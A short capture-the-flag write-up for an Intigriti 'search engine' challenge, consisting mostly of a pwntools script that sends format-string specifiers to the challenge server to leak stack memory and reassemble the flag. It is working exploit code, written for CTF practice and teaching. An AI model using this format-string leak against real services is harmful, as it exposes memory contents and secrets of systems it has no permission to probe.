In an attempt to block third party software, we've been using our very own search engine! It doesn't yet have every feature, but at least it's very secure!
Solution
from pwn import *
context.log_level = 'info'
flag = ''
# Let's fuzz x values
for i in range(12, 16):
try:
# Connect to server
io = remote('searchengine.ctf.intigriti.io', 1337, level='warn')
# Format the counter
# e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
io.sendline('%{}$p'.format(i).encode())
# Receive the response (leaked address followed by '.' in this case)
io.recvuntil(b'No result found. You searched for - ')
result = io.recv()
if not b'nil' in result:
print(str(i) + ': ' + str(result))
try:
# Decode, reverse endianess and print
decoded = unhex(result.strip().decode()[2:])
reversed_hex = decoded[::-1]
print(str(reversed_hex))
# Build up flag
flag += reversed_hex.decode()
except BaseException:
pass
io.close()
except EOFError:
io.close()
# Print and close
info(flag)
